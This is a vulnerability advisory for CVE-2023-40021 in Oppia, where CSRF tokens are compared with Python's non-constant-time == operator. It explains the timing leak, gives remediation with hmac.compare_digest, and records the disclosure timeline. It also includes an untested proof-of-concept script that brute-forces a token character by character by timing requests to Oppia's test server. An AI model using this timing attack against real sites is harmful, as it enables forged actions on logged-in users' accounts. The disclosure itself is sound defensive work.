Vulnerability Report
Summary
When comparing a received CSRF token against the expected token, Oppia uses the string equality operator (==), which is not safe against timing attacks. By repeatedly submitting invalid tokens, an attacker can brute-force the expected CSRF token character by character. Once they have recovered the token, they can then submit a forged request on behalf of a logged-in user and execute privileged actions on that user's behalf.
Details
The function to validate received CSRF tokens is at oppia.core.controllers.base.CsrfTokenManager.is_csrf_token_valid:
def is_csrf_token_valid(cls, user_id: Optional[str], token: str) -> bool:
    """Validates a given CSRF token.

    Args:
        user_id: str|None. The user_id to validate the CSRF token against.
        token: str. The CSRF token to validate.

    Returns:
        bool. Whether the given CSRF token is valid.
    """
    try:
        parts = token.split('/')
        if len(parts) != 2:
            return False

        issued_on = int(parts[0])
        age = cls._get_current_time() - issued_on
        if age > cls._CSRF_TOKEN_AGE_SECS:
            return False

        authentic_token = cls._create_token(user_id, issued_on)
        if authentic_token == token:
            return True

        return False
    except Exception:
        return False
The vulnerability is here:
        if authentic_token == token:
In CPython, the equality operator on unicode objects uses memcmp to compare the objects' values (see Objects/unicodeobject.c in the CPython repo):
static int
unicode_compare_eq(PyObject *str1, PyObject *str2)
{
    int kind;
    const void *data1, *data2;
    Py_ssize_t len;
    int cmp;

    len = PyUnicode_GET_LENGTH(str1);
    if (PyUnicode_GET_LENGTH(str2) != len)
        return 0;
    kind = PyUnicode_KIND(str1);
    if (PyUnicode_KIND(str2) != kind)
        return 0;
    data1 = PyUnicode_DATA(str1);
    data2 = PyUnicode_DATA(str2);

    cmp = memcmp(data1, data2, len * kind);
    return (cmp == 0);
}
Here is an example implementation of memcmp from gcc (from libgcc/memcmp.c in the gcc repo):
int
memcmp (const void *str1, const void *str2, size_t count)
{
  const unsigned char *s1 = str1;
  const unsigned char *s2 = str2;

  while (count-- > 0)
    {
      if (*s1++ != *s2++)
        return s1[-1] < s2[-1] ? -1 : 1;
    }
  return 0;
}
Notice that this function is not constant-time; that is, if str1 and str2 have their first difference at an earlier index, the function will terminate sooner. This means that if the received CSRF token and the expected one differ at an earlier index, the is_csrf_token_valid() function will terminate sooner, which leaks sensitive information to an attacker. For details on how an attacker can abuse this information, see the PoC below.
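The early-exit behavior can be illustrated in pure Python. This is a minimal sketch, not CPython's actual code path: early_exit_compare is a hypothetical helper that mimics the byte-by-byte loop above and reports how many bytes it inspected before returning, which stands in for running time.

```python
from typing import Tuple


def early_exit_compare(expected: bytes, received: bytes) -> Tuple[bool, int]:
    """Mimic a naive memcmp: stop at the first differing byte.

    Returns (equal, bytes_inspected). The count is a proxy for running time.
    """
    if len(expected) != len(received):
        return False, 0
    inspected = 0
    for a, b in zip(expected, received):
        inspected += 1
        if a != b:
            return False, inspected
    return True, inspected


expected = b'GONUjFmtQN0DkHt67ucdZw=='

# Wrong at the first byte: the loop stops immediately.
wrong_first = early_exit_compare(expected, b'A' * 22 + b'==')
# First three bytes correct: the loop runs longer before rejecting.
three_right = early_exit_compare(expected, b'GON' + b'A' * 19 + b'==')

print(wrong_first, three_right)
```

The second guess is rejected later than the first, and that difference is the signal the PoC tries to measure over the network.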
PoC
Note: I have not tested this PoC. I am including it as an example of how this vulnerability could be abused to make the potential attack clear.
Prerequisites: To pull off this attack, an attacker needs a user to be logged-in to Oppia and have an attacker-controlled website open at the same time.
Attack: The attacker-controlled website issues requests to a protected Oppia endpoint, for example a PUT request to https://www.oppiatestserver.org/preferenceshandler/data to change the user's bio with the following payload:
{
"payload": {"update_type": "user_bio", "data": "testing"},
"csrf_token": "1691808272/GONUjFmtQN0DkHt67ucdZw==",
"source": "https://www.oppiatestserver.org/preferences"
}
Note that the CSRF token could be generated like this:
>>> import base64
>>> import hmac
>>> import time
>>> digest = base64.urlsafe_b64encode(hmac.digest(b'key', b'msg', digest='md5')).decode('utf-8')
>>> timestamp = int(time.time())
>>> print(f'{timestamp}/{digest}')
1691808272/GONUjFmtQN0DkHt67ucdZw==
Since the user is logged-in to Oppia, their valid session cookie will be sent along with the request, making it appear that the request came from an authorized user. However, the CSRF token will be invalid (here and elsewhere, I'm ignoring the negligible possibility of 128-bit collisions). The attacker needs to guess the 128-bit digest portion of the token, which is normally impossible. However, in this case, they can take advantage of the timing vulnerability discussed above. Here's how the attack might work (code is in Python for clarity, but to run on the attacker-controlled website, this would be implemented in JavaScript):
import time

import numpy as np

# Defined in RFC 4648, section 5: https://datatracker.ietf.org/doc/html/rfc4648.html#section-5
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
# How many trials to average timing measurements over. Averaging reduces noise from network latency.
TRIALS = 5

# A base64-encoded MD5 hash is always 22 characters from ALPHABET, followed by two padding characters.
# This is because an MD5 hash is 128 bits. Each Base64 character provides log2(64)=6 bits of information,
# so we need ceil(128/6)=22 Base64 characters to encode the hash. Then 2 padding characters get added
# because Base64 encodes every 3 bytes as 4-character chunks, so the length of the base64 string needs to
# be a multiple of 4. Source: https://stackoverflow.com/a/13296298.
# The guess is kept as a list of characters because Python strings are immutable.
guess = list(ALPHABET[0] * 22 + '==')
for known_chars in range(22):
    avg_times = []
    for char in ALPHABET:
        guess[known_chars] = char
        total_time = 0
        for _ in range(TRIALS):
            start = time.time()
            # Suppose we have a submit_request() function that takes a time and a guess,
            # crafts the request, and sends it.
            submit_request(start, ''.join(guess))
            end = time.time()
            total_time += (end - start)
        avg_times.append(total_time / TRIALS)
    # With the correct guess, the submitted and expected tokens shared a longer prefix, so rejection took longer.
    guess[known_chars] = ALPHABET[np.argmax(avg_times)]
Sometime in the last iteration of the outer loop (and possibly earlier if the attacker got lucky), the guess was correct and the request was accepted by the server, completing the attack.
Caveats: This attack has to complete within 1 second because every second, the time used in computing the token changes. The attacker then has to start their brute-forcing from scratch. However, the attacker only needs to submit 22 × 64 × 5 = 7,040 requests within this second, which, while not trivial, is feasible. Further, an attacker will in expectation hit the correct token after submitting only half as many requests, may be able to optimize the brute-forcing logic to use fewer trials, and can run this attack against many users so that even a low probability of guessing the token leads to at least some successful attacks.
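The figures used in the PoC and in the caveat can be checked with a few lines of Python. This is only a worked calculation; the constant names are chosen here for illustration and mirror the values stated above.

```python
import base64
import math

ALPHABET_SIZE = 64  # URL-safe Base64 alphabet (RFC 4648, section 5)
MD5_BITS = 128      # size of an MD5 digest
TRIALS = 5          # timing samples per candidate, as in the PoC

# Characters needed to carry 128 bits at log2(64) = 6 bits per character.
digest_chars = math.ceil(MD5_BITS / math.log2(ALPHABET_SIZE))

# Worst case: every candidate character at every position, TRIALS times each.
worst_case_requests = digest_chars * ALPHABET_SIZE * TRIALS

# Cross-check against a real encoding of a 16-byte (128-bit) value.
encoded = base64.urlsafe_b64encode(bytes(16)).decode('ascii')

print(digest_chars, worst_case_requests, len(encoded), encoded[-2:])
```

For comparison, guessing the digest without the timing side channel would mean searching a space of 2**128 values.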
Suggested Remediation
Essential: The expected and received CSRF tokens should be compared using hmac.compare_digest() instead, which is constant-time. The new code would look like this:
        if hmac.compare_digest(authentic_token, token):
Note that compare_digest only accepts either two ASCII-only str objects or two bytes objects.
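The input restriction is easy to see in a short standalone example. The token value below is the illustrative one from this report, and the non-ASCII string is made up for the demonstration.

```python
import hmac

authentic_token = '1691808272/GONUjFmtQN0DkHt67ucdZw=='

# Two ASCII-only str objects: supported.
str_match = hmac.compare_digest(
    authentic_token, '1691808272/GONUjFmtQN0DkHt67ucdZw==')
str_mismatch = hmac.compare_digest(
    authentic_token, '1691808272/AAAAAAAAAAAAAAAAAAAAAA==')

# Two bytes objects: supported.
bytes_match = hmac.compare_digest(
    authentic_token.encode('utf-8'), authentic_token.encode('utf-8'))

# A str containing non-ASCII characters raises TypeError.
try:
    hmac.compare_digest(authentic_token, 'tök€n')
    non_ascii_rejected = False
except TypeError:
    non_ascii_rejected = True

print(str_match, str_mismatch, bytes_match, non_ascii_rejected)
```

In is_csrf_token_valid as quoted above, such a TypeError would be caught by the existing except Exception clause and treated as an invalid token. Encoding both values to bytes before comparing would avoid relying on that.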
Suggested:
- Instead of computing the HMAC with MD5, use SHA256. While the attacks on MD5 so far do not compromise the security of an HMAC, it would be prudent to move away from MD5 since attacks will likely get better over time.
- CSRF tokens should ideally be scoped to user sessions, but Oppia currently leaves them valid for 48 hours. This means that when a user logs out and logs back in, a CSRF token from the previous session could still be valid, which is not ideal. I don't see any attacks that this would allow, but session-scoped CSRF tokens are a common best practice (see OWASP link below).
- CSRF tokens should include a nonce, not just a timestamp, to ensure that consecutive calls in the same second produce different tokens. Again, this is more of a best-practice thing (see OWASP link below) than a protection against an attack (at least that I can see).
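The first and third suggestions can be combined with the essential fix as follows. This is a rough sketch under stated assumptions, not Oppia's implementation: SECRET_KEY, TOKEN_AGE_SECS, the three-part token layout, and the function names are all hypothetical and chosen for illustration only.

```python
import base64
import hmac
import secrets
import time
from typing import Optional

SECRET_KEY = secrets.token_bytes(32)  # Hypothetical server-side secret.
TOKEN_AGE_SECS = 60 * 60 * 48         # 48 hours, the lifetime cited above.


def _sign(user_id: Optional[str], issued_on: int, nonce: str) -> str:
    """HMAC-SHA256 over the user, timestamp, and nonce, URL-safe Base64."""
    msg = f'{user_id}:{issued_on}:{nonce}'.encode('utf-8')
    digest = hmac.new(SECRET_KEY, msg, digestmod='sha256').digest()
    return base64.urlsafe_b64encode(digest).decode('ascii')


def create_token(user_id: Optional[str], issued_on: Optional[int] = None) -> str:
    """Build 'timestamp/nonce/signature'; the nonce makes each token unique."""
    if issued_on is None:
        issued_on = int(time.time())
    nonce = secrets.token_urlsafe(16)
    return f'{issued_on}/{nonce}/{_sign(user_id, issued_on, nonce)}'


def is_token_valid(user_id: Optional[str], token: str) -> bool:
    try:
        issued_on_str, nonce, _ = token.split('/')
        issued_on = int(issued_on_str)
    except ValueError:
        return False  # Wrong number of parts or non-numeric timestamp.
    if int(time.time()) - issued_on > TOKEN_AGE_SECS:
        return False
    expected = f'{issued_on}/{nonce}/{_sign(user_id, issued_on, nonce)}'
    # Compare as bytes so that non-ASCII input cannot raise TypeError.
    return hmac.compare_digest(expected.encode('utf-8'), token.encode('utf-8'))


token = create_token('user_1')
print(is_token_valid('user_1', token), is_token_valid('user_2', token))
```

Session scoping, the second suggestion, is not shown here because it depends on how sessions are stored.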
Further reading:
Impact
An attacker who can lure a logged-in Oppia user to a malicious website can perform any change on Oppia that the user is authorized to do, including changing profile information; creating, deleting, and changing explorations; etc. Note that the attacker cannot change a user's login credentials since those are managed by Google, which (hopefully) has its own CSRF protections.
Remediation
The essential remediation and suggested remediations 1 and 3 were implemented in #18769, which was merged in commit b89bf80. This commit will be deployed to production as part of May 2023 hotfix 2.
Timeline
- Reported: 2023-08-11
- CVE-2023-40021 assigned: 2023-08-14
- Remediated:
  - Remediation Merged: 2023-08-12
  - Remediation Deployed: 2023-08-14 (in May 2023 hotfix 2)
- Disclosed: 2023-08-16